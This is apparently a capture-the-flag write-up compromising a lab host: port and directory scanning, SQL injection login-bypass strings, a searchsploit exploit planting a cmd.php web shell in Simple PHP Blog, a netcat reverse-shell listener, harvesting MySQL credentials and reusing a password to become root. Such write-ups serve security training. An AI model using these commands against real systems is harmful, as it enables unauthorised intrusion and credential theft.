Initial Foothold
- Network discovery
nmap -sn 10.10.10.200/24
My target is 10.10.10.100.
2. Port scan
nmap -Pn 10.10.10.100nmap -Pn -p1000- 10.10.10.100
3. OS and service scan
nmap -A -p22,80 10.10.10.100
4. Vuln scan
nmap --script vuln -p22,80 10.10.10.100
There’re directories on HTTP site as shown.
Service Enumeration
- 22/tcp OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
Connect to SSH
ssh 10.10.10.100
No any banners appear.
- 80/tcp Apache httpd 2.2.17 ((Ubuntu))
- Nikto scan
nikto -h http://10.10.10.100
There’re sub-directories as listed.
2. Further directory scan w/ gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.100/ -x php,txt,html,sh,cgi,bak -q
3. Access the site
Note the email ‘admin@isints.com’ in case I need it.
Register the site.
Follow activation link
Login, nothing comes up.
However if you supply SQL injection, you also get admin panel, but It’s nothing anyway
Here’s my list of tested query
1' or 1=1-- -> failed
1' or 1=1-- - -> failed
1' or 1=1--+ -> failed
1' or 1=1# -> succeeded
Another interesting directory is /blog
Viewing page source revealed that It’s Simple PHP Blog 0.4.0.
Exploitation
- Search for existing exploit, I came across this script.
Look up scipt number and copy from searchsploit
Copy command
searchsploit -m 1191
Run the script for testing
./1191.pl
Now I have the usage.
Since I want shell, my choice is number 1
./1191.pl -h http://10.10.10.100/blog -e 1
cmd.php is created and stored in http://10.10.10.100/blog/images/
Access the path
Since I created the cmd.php, but I don't know how to use. So I looked up in the code and there’s GET parameter, cmd.
Try the script
http://10.10.10.100/blog/images/cmd.php?cmd=id
It’s worked.
2. Get the reverseshell
Create listener on port 443
rlwrap nc -lvp 443
I used this cheat sheet.
The method is intercept the resuest w/ Burp Suite and send to the repeater.
Copy command and encode to URL w/ Burp Suite Decoder
Paste the encoded command
After my tries, I succceded w/ this command.
Privilege Escalation
- Directory Explore
There’s many directories to explore as listed:
/var/www/var/var/logs/var/backups/var/mail/home//opt/tmp
After Exploring I came across some files in /var/www and /var
Here’re commands.
cd /var/wwwls -la
I came across mysqli_connect.php
cat /var/www/mysqli_connect.php
It’s a credential of MySQL.
cd /var/ls -la
I came across another mysqli_connect.php
cat /var/mysqli_connect.php
It’s another credential of mysql.
Before use it to access MySQL. I used to login as root in case there’s a re-using password.
su rootpassword: goodday
Failed!
Another one
su rootpassword: goodday
whoami
Now I’m root.